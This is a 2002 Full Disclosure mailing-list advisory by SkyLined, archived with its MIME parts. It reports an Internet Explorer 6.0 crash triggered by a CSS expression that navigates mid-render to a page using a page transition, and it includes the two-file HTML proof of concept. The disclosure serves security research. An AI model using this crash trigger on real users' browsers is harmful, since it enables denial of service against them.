Full Disclosure mailing list archives
crash IE using jscript and page transitions
From: full-disclosure () lists netsys com (Berend-Jan Wever)
Date: Fri, 12 Jul 2002 17:05:20 +0200
This is a multi-part message in MIME format. ------=_NextPart_000_000E_01C229C6.4DBEF9A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable (on my site: http://spoor12.edup.tudelft.nl/SkyLined = v4.2/?Advisories/Microsoft Internet Explorer/Page transition DoS) The problem Internet Explorer 6.0 can be made to throw an exception using specially = crafted jscript commands and page transitions. Other versions are = probably vulnerable too but this has not been tested. Problems arise = when a page transition is activated by a new page when the old page has = not been rendered yet. This situation can occur when javascript = redirects the browser before the page is fully rendered.=20 An example The following two pages, called 1.html and 2.html, crash IE with an = Access violation in mshtml.dll when 1.html is loaded into IE. 1.html: <HTML style=3D"width:expression(navigate('2.html'));"></HTML>=20 2.html: <HTML><HEAD><META http-equiv=3D"Page-Enter" = content=3D"blendTrans()"></HEAD></HTML>=20 Impact Seems to be just a minor bug resulting in a DoS.=20 Berend-Jan Wever aka SkyLined http://spoor12.edup.tudelft.nl/ ------=_NextPart_000_000E_01C229C6.4DBEF9A0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2> <H3><FONT size=3D2>(on my site: <A=20 href=3D"http://spoor12.edup.tudelft.nl/SkyLined = v4.2/?Advisories/Microsoft Internet Explorer/Page transition = DoS">http://spoor12.edup.tudelft.nl/SkyLined=20 v4.2/?Advisories/Microsoft Internet Explorer/Page transition DoS</A>)<A=20 href=3D"http://spoor12.edup.tudelft.nl/"></A></FONT><BR><BR>The = problem</H3> <P>Internet Explorer 6.0 can be made to throw an exception using = specially=20 crafted jscript commands and page transitions. Other versions are = probably=20 vulnerable too but this has not been tested. Problems arise when a page=20 transition is activated by a new page when the old page has not been = rendered=20 yet. This situation can occur when javascript redirects the browser = before the=20 page is fully rendered. </P> <H3>An example</H3> <P>The following two pages, called 1.html and 2.html, crash IE with an = Access=20 violation in mshtml.dll when 1.html is loaded into=20 IE.<BR><BR>1.html:<BR><CODE><FONT size=3D4><HTML=20 style=3D"width:expression(navigate('2.html'));"></HTML></FONT></= CODE>=20 <BR>2.html:<BR><CODE><FONT size=3D4><HTML><HEAD><META=20 http-equiv=3D"Page-Enter"=20 content=3D"blendTrans()"></HEAD></HTML></FONT></CODE> = </P> <H3>Impact</H3> <P>Seems to be just a minor bug resulting in a DoS. </P> <P>Berend-Jan Wever aka SkyLined<BR><A=20 href=3D"http://spoor12.edup.tudelft.nl/">http://spoor12.edup.tudelft.nl/<= /A></P></FONT></DIV></BODY></HTML> ------=_NextPart_000_000E_01C229C6.4DBEF9A0--
Current thread:
- crash IE using jscript and page transitions Berend-Jan Wever (Jul 12)
- crash IE using jscript and page transitions Blue Boar (Jul 12)